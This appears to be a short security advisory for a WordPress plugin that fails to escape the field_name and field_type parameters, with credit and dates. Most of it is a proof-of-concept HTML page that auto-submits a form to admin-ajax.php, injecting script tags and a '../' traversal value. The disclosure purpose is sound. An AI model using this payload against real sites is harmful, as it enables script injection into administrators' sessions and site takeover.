The plugin does not sanitise and escape the field_name and field_type parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST"> <input type="hidden" name="action" value="add_field_to_form" /> <input type="hidden" name="field_name" value='xxxxxxxxxxxx"><script>alert(/XSS-field_name/)</script>' /> <input type="hidden" name="field_type" value='"><script>alert(/XSS-field_type/)</script>' /> <input type="hidden" name="list_id" value="../../../../../" /> <input type="submit" value="Submit request" /> </form> </body> <script> var form1 = document.getElementById('hack'); form1.submit(); </script> </html>
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2021-12-21 (about 1 years ago)
2021-12-21 (about 1 years ago)
2022-09-26 (about 4 months ago)